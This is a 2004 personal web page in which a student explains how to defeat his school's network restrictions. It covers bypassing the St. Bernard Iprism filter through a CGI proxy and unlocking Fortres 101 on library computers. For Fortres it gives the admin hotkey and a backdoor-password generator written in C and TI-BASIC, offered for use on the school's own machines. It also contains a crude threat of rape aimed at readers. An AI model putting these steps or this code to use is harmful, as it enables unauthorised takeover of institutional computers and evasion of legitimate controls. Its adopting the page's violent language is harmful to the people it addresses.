
Exploring the MHS Network
by Tommy C. Li on 05.05.2004. Updated on 07.10.2004
Over the past few days, I've been exploring the Moorpark High School network. It's interesting. Also, this site is rated by Iprism as being related to "hacking". They mean "cracking" - of course. I've decided to fulfill that rating.
Please note that all this information is a privilege and not meant to be abused. Do not abuse it, or I will personally aid the Administration in hunting you down and raping you - right through the pants.
St. Bernard's Iprism
All Internet traffic is filtered through St. Bernard's Iprism - also known as "the accursed beast". The filter is heavy-handed and inaccurate. It can be easily circumvented with the use of a CGI proxy. I've made some available in the past. The current one is located here.
Fortres in the Library
I've also been on the computers in the library. They are horribly crippled through use of a program known as Fortres 101. I'm pretty sure they are using version 4 of Fortres. I first discovered this because of the odd icon in the system tray, and later, through perusing the C:\FGC folder.
You are totally crippled from doing anything - you cannot even access "My Computer". Luckily, you can browse the filesystem through both the Open and Save dialogs, as well as typing "c:\" in the Internet Explorer address bar. Ironically, it's Microsoft's hated browser-filemanager integration that allows this.
Naturally, I was irritated by the restrictions that made it hard to do any work. I did some research. A paper on Fortres was published in "2600: The Hacker Quarterly", Volume 18, Number 3, Fall 2001. I read it. Fortres basically adds a layer to Windows that checks whether the action is on the "approved list".
Fortres, of course, also has an administrator control panel - password protected. Luckily, there is also a backdoor code used for "emergencies". How it works is that each time you bring up the password dialog, there is a backdoor code generated from the system time. This code is shown to you in the "Enter Password" dialog box. If you forget your password, call Fortres Grand Corporation, give them the backdoor code, and they give you the backdoor password. You must have appropriate identification before they give the password to you.
You can bring up the password dialog by holding down ctrl+shift+esc for Windows 9x, or ctrl+shift+F for NT. For the library computers, it's the latter hotkey.
Well, someone (Amatus) figured out the algorithm used in generating the backdoor password from the backdoor code. Here it is:
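    // key - the backdoor key (the code shown in the password dialog)
    // The return value is the backdoor password
    unsigned short backdoor_password( unsigned long key )
    {
        short x;   // 16-bit signed; each assignment below rolls over into this range

        x = ((short)( key * -1.2456 ) + 1 ) * 65533;
        x = ( x / 2 + 7 ) * 3;
        x /= 2;
        return x * x;   // rolled over again into the unsigned 16-bit return type
    }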
While it may look like some simple arithmetic, it is more. In the C programming language, the "short" variable type is a 16-bit integer. It has a specific range. Unsigned, it can be between 0 and 65535; signed, it can be between -32768 and 32767. If it "overflows" the range, the computer "rolls it over" until it's within range. For example, adding 1 to 32767 yields -32768.
The algorithm makes heavy use of the "rollover" to calculate the final code. Note that the final code is also returned as an unsigned short, so it may be rolled over as well.
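The rollover described above, written out explicitly as an added example (not code from the original page; the helper names are made up here). In C the arithmetic itself is carried out in `int`, and the rollover happens when the result is stored back into a 16-bit variable, which mainstream compilers do by wrapping modulo 65536.

```c
#include <stdint.h>
#include <stdio.h>

/* Reduce any integer to the value a 16-bit unsigned variable would hold. */
static uint16_t wrap_u16(long long v)
{
    long long m = v % 65536;          /* C's % keeps the sign of v */
    if (m < 0)
        m += 65536;
    return (uint16_t)m;
}

/* Reduce any integer to the value a 16-bit two's-complement signed
   variable would hold (range -32768 .. 32767). */
static int16_t wrap_s16(long long v)
{
    long long m = wrap_u16(v);
    return (int16_t)(m > 32767 ? m - 65536 : m);
}

/* 65533 is 65536 - 3, so multiplying by 65533 and rolling over gives the
   same 16-bit result as multiplying by -3. Returns 1 if that holds for
   every possible signed 16-bit input. */
static int mul_65533_is_mul_minus3(void)
{
    for (long long x = -32768; x <= 32767; x++)
        if (wrap_s16(x * 65533) != wrap_s16(x * -3))
            return 0;
    return 1;
}

/* A square stored into an unsigned 16-bit value keeps only the low 16 bits. */
static uint16_t square_u16(int16_t x)
{
    return wrap_u16((long long)x * x);
}

int main(void)
{
    printf("32767 + 1 as signed short   : %d\n", wrap_s16(32767 + 1));
    printf("-1 as unsigned short        : %u\n", (unsigned)wrap_u16(-1));
    printf("300 * 300 as unsigned short : %u\n", (unsigned)square_u16(300));
    printf("x*65533 == x*-3 (16-bit)    : %d\n", mul_65533_is_mul_minus3());
    return 0;
}
```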
I put the code in my C++ compiler, and it did indeed generate working codes. The problem was - I couldn't take my computer to school, and keeping a decryptor program on a floppy disk is a bit déclassé. So I set about putting the algorithm in my graphing calculator. The problem is that my calculator used TI-BASIC - a different programming language - and there is no "short" type - rather, the variables have a HUGE range (which makes sense - given that it's a calculator).
So there are two programs. One was to simulate the computer converting the number to a signed "short", and the other to do the actual arithmetic operation. "fortres1" does the integer enforcement, while "fortress" does the actual operation. It's in TI-89 Basic. It should be completely compatible with all TI calculators. You'll have to replace the mod function with an equivalent. Also, you'll have to change some of the syntax. The code should be self-explanatory - even to laymen.
Note that "->" is the STO assignment button, while the "a<-32768" means "a is less than negative 32768".
    fortress()
    Prgm
      ClrIO
      Disp "Backdoor Decoder"
      Input a
      a*-1.2456->a
      fortres\fortres1()
      (a+1)*65533->a
      fortres\fortres1()
      a/2->a
      fortres\fortres1()
      (a+7)*3->a
      fortres\fortres1()
      a/2->a
      fortres\fortres1()
      mod(a*a,65536)->a
      Disp "Backdoor Code:"
      Disp a
    EndPrgm

    fortres1()
    Prgm
      remain(a,65536)->a
      If a>32767
        a-65536->a
      If a<-32768
        a+65536->a
      iPart(a)->a
    EndPrgm
This performs the same operation as the above C function. It's come to my attention that it outputs a different result in some instances. It should still work 95% of the time though.
If you input the ever-changing "backdoor code", it will output the backdoor password. With that, you can disable the restrictions and cause utter chaos if you wanted to. You'd have full control over the machine.
Note that I never said that I actually did any of this. It's just ... theory. Also, Fortres may also be on other computers than the ones in the Library.
More Information
Our wonderful district provides a great deal of information on the specifics of their network. See this website:
http://www.mrpk.k12.ca.us/web/LINKS/resource.htm
Damn - they should make me a network aide or something - so I have a pretense to know all this shit.